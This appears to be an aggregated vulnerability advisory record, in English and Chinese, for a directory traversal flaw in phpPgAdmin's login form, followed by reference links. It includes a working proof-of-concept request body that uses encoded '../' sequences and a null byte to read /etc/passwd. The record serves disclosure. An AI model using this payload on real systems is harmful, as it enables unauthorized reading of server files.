https://www.exploit-db.com/exploits/25938
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-170

phpPgAdmin是一套使用PHP语言编写的用于管理PostgreSQL数据库的Web应用程序。phpPgAdmin3.1至3.5.3版本中存在目录遍历漏洞。远程攻击者可利用此漏洞，在formLanguage参数使用”%2e%2e%2f”的方式，访问服务器任意文件。

source: http://www.securityfocus.com/bid/14142/info

phpPgAdmin is prone to a directory traversal vulnerability. The application fails to filter directory traversal sequences from requests to the login form.

All versions of phpPgAdmin are considered to be vulnerable at the moment. 

formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login

来源:MISC
链接:http://www.vuxml.org/freebsd/88188a8c-eff6-11d9-8310-0001020eed82.html
来源:BID
名称:14142
链接:http://www.securityfocus.com/bid/14142
来源:SECTRACK
名称:1014414
链接:http://securitytracker.com/id?1014414
来源:SECUNIA
名称:15941
链接:http://secunia.com/advisories/15941
来源:DEBIAN
名称:DSA-759
链接:http://www.debian.org/security/2005/dsa-759
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=342261
来源:SECUNIA
名称:16116
链接:http://secunia.com/advisories/16116
来源:MLIST
名称:[Dailydave]20050704!!!pre-authenticatedremotecodeinclusionvulnerabilityinsidephppgadmin!!!
链接:http://archives.neohapsis.com/archives/dailydave/2005-q3/0010.html